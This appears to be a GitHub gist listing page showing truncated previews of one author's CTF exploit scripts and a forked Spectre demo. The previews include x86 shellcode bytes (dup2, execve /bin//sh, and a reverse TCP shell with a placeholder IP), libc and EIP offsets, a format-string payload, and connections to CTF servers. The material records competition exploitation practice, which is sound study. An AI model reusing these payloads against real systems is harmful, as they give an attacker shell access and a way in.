soez soez
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from amnesia import * | |
| from struct import pack, unpack | |
| import time, sys | |
| s = amnesiaSocket("127.0.0.1", 20005) | |
| print s.readLine() | |
| # base libc.so.6 0xb7e5f000 | |
| base = 0xb7e5f000 | |
| shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" # dup2 by Nox & soez |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- encoding: utf-8 -*- | |
| from amnesia import * | |
| from struct import pack, unpack | |
| import time, sys | |
| ################################################################################## | |
| # Exploit configuration parameters.. Must be adjusted to the target system and app. | |
| OFFSET_SAVED_EIP = 0xb7ffc848 | |
| PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2 | |
| OFFSET_TO_LIBC = 0x1a9000 |
soez
/ ctf_ekoparty_2015-pwn50_baby.py
Created
October 23, 2015 21:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from amnesia import * | |
| from struct import pack, unpack | |
| import time | |
| p = lambda x: pack("<L", x) | |
| u = lambda x: unpack('<L', x)[0] | |
| shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" | |
| shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73" | |
| shellcode += "\x68\x68\x2f\x2f\x62\x69\x89\xe3" |
soez
/ internetwatche_ctf_exp80.py
Created
February 22, 2016 04:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import * | |
| import socket, sys | |
| p = lambda x: pack("<L", x) | |
| u = lambda x: unpack("<L", x)[0] | |
| # ip = socket.inet_aton("xx.xx.xx.xx") | |
| # reverse TCP by Nox rhost=ip rport=31337 | |
| shellcode = "\x31\xc0\x99\x50\x89\xc3\x43\x52" | |
| shellcode += "\x53\x6a\x02\x89\xe1\xb0\x66\xcd" |
soez
/ ctf_hitcon_2014-stkof.py
Created
March 28, 2016 05:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from amnesia import * | |
| from struct import pack, unpack | |
| p64 = lambda x: pack("<Q", x) | |
| u64 = lambda x: unpack("<Q", x)[0] | |
| s = amnesiaSocket("localhost", 4444) | |
| s.writeLine("1") | |
| s.writeLine("256") | |
| s.writeLine("1") |
soez
/ Nullcon_2017-level2.py
Created
February 15, 2017 04:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # 0x804b084 stdout@got.plt | |
| # 0x804b018 fflush@got.plt | |
| # 0x804b010 dup2@got.plt | |
| r = remote("34.198.96.6", 9002) | |
| r.recvuntil("Enter name: ") | |
| r.sendline("%8$s") | |
| r.recvuntil("Enter password: ") |
soez
/ Boston_Key_Party_2017-memo.py
Created
February 27, 2017 13:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote("54.202.7.144", 8888) | |
| def menu(): | |
| r.recvuntil(">> ") | |
| def create(pos, size, payload): | |
| menu() | |
| r.sendline("1") |
soez
/ spectre.c
Created
January 4, 2018 06:15
— forked from ErikAugust/spectre.c
Spectre example code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
soez
/ SharifCTF_2018-t00p_secrets.py
Last active
February 4, 2018 01:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| local = False | |
| r = process("./t00p_secrets") if local else remote('ctf.sharif.edu', 22107) | |
| r.recvuntil("Enter your master key: ") | |
| r.sendline(p64(4283034714650536567L) + p64(8243946171696569202L) + p64(7454134929210039143L)) | |
| def menu(n): |
soez
/ nn8ed - pokedex_nn2k18.py
Last active
October 10, 2018 15:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def menu(): | |
| r.recvuntil("option> ") | |
| def create(pos, name, height, weight, power): | |
| menu() | |
| r.sendline("1") | |
| r.recvuntil("Enter the new pokemon ID: ") | |
| r.sendline(str(pos)) |
OlderNewer